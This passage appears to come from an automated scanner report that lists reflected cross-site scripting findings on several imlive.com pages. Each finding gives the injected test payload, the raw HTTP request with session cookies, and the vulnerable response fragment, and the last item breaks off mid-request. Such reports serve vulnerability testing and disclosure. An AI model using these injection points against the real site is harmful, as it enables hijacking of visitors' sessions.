2.99. http://imlive.com/live-sex-chats/live-sex-video/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/live-sex-video/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7f783'-alert(1)-'ad3501b39a0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/live-sex-video/?7f783'-alert(1)-'ad3501b39a0=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:16 GMT
Connection: close
Content-Length: 25590
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/videoslibrary.aspx&he=imlive.com&ul=/live-sex-chats/live-sex-video/?7f783'-alert(1)-'ad3501b39a0=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined'
...[SNIP]...

2.100. http://imlive.com/live-sex-chats/live-sex-video/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /live-sex-chats/live-sex-video/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6088"><a>d342b9399fb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /live-sex-chats/live-sex-video/?e6088"><a>d342b9399fb=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:03 GMT
Connection: close
Content-Length: 25443
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/live-sex-chats/live-sex-video/?e6088"><a>d342b9399fb=1');return false;" lang="en-US" hreflang="en-US">
...[SNIP]...

2.101. http://imlive.com/live-sex-chats/nude-chat/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/nude-chat/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload acb7a'-alert(1)-'34ec5f17816 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/nude-chat/?acb7a'-alert(1)-'34ec5f17816=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:29 GMT
Connection: close
Content-Length: 23794
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/keyholesexplanation.aspx&he=imlive.com&ul=/live-sex-chats/nude-chat/?acb7a'-alert(1)-'34ec5f17816=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined'
...[SNIP]...

2.102. http://imlive.com/live-sex-chats/nude-chat/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /live-sex-chats/nude-chat/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f06eb"><a>2a1bdec8937 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /live-sex-chats/nude-chat/?f06eb"><a>2a1bdec8937=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:23 GMT
Connection: close
Content-Length: 23647
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/live-sex-chats/nude-chat/?f06eb"><a>2a1bdec8937=1');return false;" lang="en-US" hreflang="en-US">
...[SNIP]...

2.103. http://imlive.com/live-sex-chats/orgies/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/orgies/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 44239'-alert(1)-'0a5659e80e9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/orgies/?44239'-alert(1)-'0a5659e80e9=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:22:29 GMT
Connection: close
Content-Length: 49856
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/orgies/?44239'-alert(1)-'0a5659e80e9=1&qs=cat=1^roomid=14^44239'-alert(1)-'0a5659e80e9=1&qs=cat=1^roomid=14^44239'-alert(1)-'0a5659e80e9=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eb
...[SNIP]...

2.104. http://imlive.com/live-sex-chats/orgies/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /live-sex-chats/orgies/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b235"><a>bd631be4c53 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /live-sex-chats/orgies/?4b235"><a>bd631be4c53=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:22:05 GMT
Connection: close
Content-Length: 49672
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a href="/live-sex-chats/orgies/?4b235"><a>bd631be4c53=1">
...[SNIP]...

2.105. http://imlive.com/live-sex-chats/pornstars/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/pornstars/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dd6ca'-alert(1)-'66a39635b46 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/pornstars/?dd6ca'-alert(1)-'66a39635b46=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:42 GMT
Connection: close
Content-Length: 266553
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/pornstars/?dd6ca'-alert(1)-'66a39635b46=1&qs=cat=1^roomid=249^dd6ca'-alert(1)-'66a39635b46=1&qs=cat=1^roomid=249^dd6ca'-alert(1)-'66a39635b46=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63
...[SNIP]...

2.106. http://imlive.com/live-sex-chats/pornstars/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /live-sex-chats/pornstars/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad2c2"><a>388c8c895ab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /live-sex-chats/pornstars/?ad2c2"><a>388c8c895ab=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:36 GMT
Connection: close
Content-Length: 266390
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a href="/live-sex-chats/pornstars/?ad2c2"><a>388c8c895ab=1">
...[SNIP]...

2.107. http://imlive.com/live-sex-chats/role-play/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /live-sex-chats/role-play/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43819"><a>7fb20b0957a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /live-sex-chats/role-play/?43819"><a>7fb20b0957a=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
